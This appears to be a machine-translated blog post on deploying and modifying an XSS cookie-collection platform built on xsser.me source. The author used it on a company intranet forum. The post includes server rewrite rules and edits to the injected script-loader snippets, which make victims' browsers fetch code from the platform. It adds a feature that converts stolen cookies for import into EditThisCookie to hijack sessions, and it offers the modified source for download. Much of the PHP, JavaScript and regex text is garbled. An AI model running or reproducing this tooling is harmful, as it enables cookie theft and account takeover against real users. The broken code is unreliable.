XSS Platform Setup and optimization (based on xsser.me source)

This week spent a little time on the company intranet Forum, unfortunately found that the original set up XSS platform hung, and then found a code to build.

In zone found a code that others optimized, the author is gosuto, address dot I

Why choose this, mainly because the author used Bootstrap to xsser.me the default theme has been modified, looks a lot of tall ~ (as for the compatible mobile end of the god horse, forget it 0 0)

Download the source code, according to the author's installation instructions to modify it: Modify the database connection fields inside the config.php, including database configuration (user name, password, database name), Web site URL path and pseudo static configuration. Import the xssplatform.sql from the root directory into the database. Executes the SQL statement in the database and changes the domain name in the database to its own domain name:

UPDATE oc_module SET code=replace (code, ' http://xsser.me ', ' HTTP://YOURDOMAIN/XSS ')

Replace the domain name in authtest.php with its own domain name. After the first registration succeeds, modify the user table in the corresponding Adminlevel 1, define yourself as a super administrator, you can send and manage the invitation code. To configure a pseudo static file based on the server type:

Apache

<ifmodule mod_rewrite.c>
rewriteengine on
rewritebase/
rewriterule ^ ([0-9a-za-z]{6}) $/index.php ? do=code&urlkey=$1 [L] 
rewriterule ^do/auth/(\w+?) (/domain/([\w\.] +?))? $  /index.php?do=do&auth=$1&domain=$3 [L] 
rewriterule ^register/(. *?) $/index.php?do=register&key=$1 [L] 
rewriterule ^register-validate/(. *?) $/index.php?do=register&act=validate&key=$1 [L]

Nginx

Rewrite "^/([0-9a-za-z]{6}) $"/index.php?do=code&urlkey=$1 break;
Rewrite "^/do/auth/" (w+?) (/domain/([w.] +?))? $ "/index.php?do=do&auth=$1&domain=$3 break;
Rewrite "^/register/" (. *?) $ "/index.php?do=register&key=$1 break;
Rewrite "^/register-validate/" (. *?) $ "/index.php?do=register&act=validate&key=$1 break;
Rewrite "^/login$"/index.php?do=login break;

The XSS platform is built here.

I encountered some bugs in the use of the process, so I made some changes to the source code. 1. Short address interface partially invalidated

In the project code has a function of switching short address, of course, the original xsser.me is not, is another author integrated in.

The Code provides a short address translation of t.cn and is.gd, with the corresponding function in line NO. 350 and line 357 of the source/function.php. Since IS.GD's API address has expired, I decided to remove this piece of content.

First delete the content displayed on the page, open templates_c/%%4d^4d3^4d30cf2a%%project_viewcode.html.php, remove the following code:

<p> 
    <pre>
        <?php echo $this->_tpl_vars[' ShortShow1 '];?>
    </pre>
</p >

Then annotate the source/project.php with the following two lines:

$shortUrl 2=longurltoshorturl2 ($LONGURL)//Short URL 2
$shortShow 2=stripstr ("<script src=". $shortUrl 2. " ></script> ");

2. Remove the time stamp after the JS address

JS address to add time stamp, is to modify the JS code, the other browser in the cache to refresh the JS. But in the actual testing of the feeling is not very large, the general code to refresh the page out of the new code. So I put the time stamp in the JS URL removed.

Make the following modifications in the source/project.php:

$codeurl =url_root. " /{$project [Urlkey]}? ". Time ();
$codeurl =url_root. " /{$project [Urlkey]} ";

$scriptShow 1=stripstr ("<textarea>" "<script src="). Url_root. " /{$project [Urlkey]}? ". Time (). " ></script> ");
$scriptShow 1=stripstr ("<script src="). Url_root. " /{$project [urlkey]}></script> ");

$code 2= ' var b=document.createelement ("script"); b.src= "'. Url_root. " /{$project [Urlkey]}? ". '" +math.random ();(d ocument.getelementsbytagname ("Head") [0]| | document.body). appendchild (b); ';
$code 2= ' var b=document.createelement ("script"); b.src= "'. Url_root. " /{$project [Urlkey]} ". '";( document.getElementsByTagName ("Head") [0]| | document.body). appendchild (b); ';

$scriptShow 2=stripstr ("</textarea>" > ");
$scriptShow 2=stripstr (" ");

3. HTML Part Optimization

Part of the code Javascript and CSS resources are obtained through the foreign CDN, and sometimes the page load very long before coming out, so the resources cited in the text are changed to local, of course, to change into domestic CDN address can also.

Search the directory in Sublime Text, find the place where Jquery-1.9.1.min.js and Bootstrap.min.js are referenced, and then modify it to a local reference, where the file is placed in the corresponding folder in Themes/default.

<script src= "Http://code.jquery.com/jquery-1.9.1.min.js" ></script>
//modified to:
<script src= " <?php echo $this->_tpl_vars[' url ' [' Themepath '];?>
/js/jquery.min.js "></script>

<script src= "Http://www.bootstrapcdn.com/bootstrap/2.3.1/js/bootstrap.min.js" ></script>
//modified to:
<script src= "<?php echo $this->_tpl_vars[' url ' [' Themepath '];?>
/js/bootstrap.min.js" > </script>

PS. Note that the modified code is two lines.

PPS. In fact, the JavaScript file is best placed at the end of <body>, but there is a need to manually find all the JavaScript to modify, too troublesome to do. 4. Add Cookie copy function

In general, when you hit the other cookie, you use the Editthiscookie tool to import cookies into chrome. However, document.cookie output cookies cannot be imported directly and need to be converted to the JSON format specified in Editthiscookie.

The source code itself with the implementation of the replication function of the JS code, but the default is commented out, because there is no complete implementation. At the same time, the copy simply prints the JSON cookie through alert () to the screen, and the alert window does not display all the content when the cookie is too large.

So I decided to make a change to this feature and put the JSON content on the Clipboard while the JSON format was complete.

First modify the original HTML node, open the%%33^334^334db811%%project_view.html.php, find the following:

<li>
<?php echo $this->_tpl_vars[' ck '];?>
 : <?php echo $this->_tpl_vars[' C ';?>
</li>

Modified as:

<li>
<?php echo $this->_tpl_vars[' ck '];?>
 : <span id= "< ? php echo $this->_tpl_vars[' ck '];?> "><?php Echo $this->_tpl_vars[' C ';?></span>
</ Li>

<tr class= "Ohidden" >

modified to:

<tr id= "<?php echo $this->_tpl_vars[' V ' [' id '];?>" class= " Ohidden ">

<!--
            &nbsp;&nbsp;<a href= "javascript:void (0)" onclick= "copy (This)" > Copy </a> 
            -->

modified to:

&nbsp;&nbsp;<a href= "javascript:void (0)" onclick= "copy (This)" > Copy </a>

When a record does not have a location or cookie value, the Copy () function will make an error, so add a judgment condition:

var table = $ (obj). Parent (). parent (); 
var L = table.find ("#location"). Text (); 
var c = table.find ("#cookie"). Text ();

Modified to:

var table = $ ("#" +obj). Parent (). parent ();
var L = table.find ("#location"). Text ();
var c = table.find ("#cookie"). Text ();
if (L = = "" | | c = = "") {return
  "";
}

Modify the return form of the copy () function:

Alert (json.stringify (data));

Modified as: Return

json.stringify (data);

To enable the JSON data to be copied onto the pasteboard, we need to use the Zeroclipboard.js plugin. Here is the calling code:

<script src= "<?php echo $this->_tpl_vars[' url ' [' Themepath '];?>
/js/zeroclipboard.min.js" > </script>

Zeroclipboard.config ({swfpath: "'. $this->_tpl_vars[' url '] [' Themepath ']." /swf/zeroclipboard.swf "});
var client = new Zeroclipboard ($ (". Copybtn "));
Client.on (' Copy ', function (event) {
  var clipboard = event.clipboarddata;
  Clipboard.cleardata ();
  Clipboard.setdata ("Text/plain", Copy (Event.target.id));
Client.on (' Aftercopy ', function (event) {
  if (typeof (Event.success[' text/plain ')) = = "undefined") {
    alert (" Cookie replication failed, please check cookie format ~ ");
  else {
    alert ("Cookies have been copied to clipboard, can import Editthiscookie ~");
  }
);

That's it.

In addition, there are some subtle changes do not say, anyway, now used to be very good ~

Finally put on my revised source pack ~

Download Address: xss_platform.tgz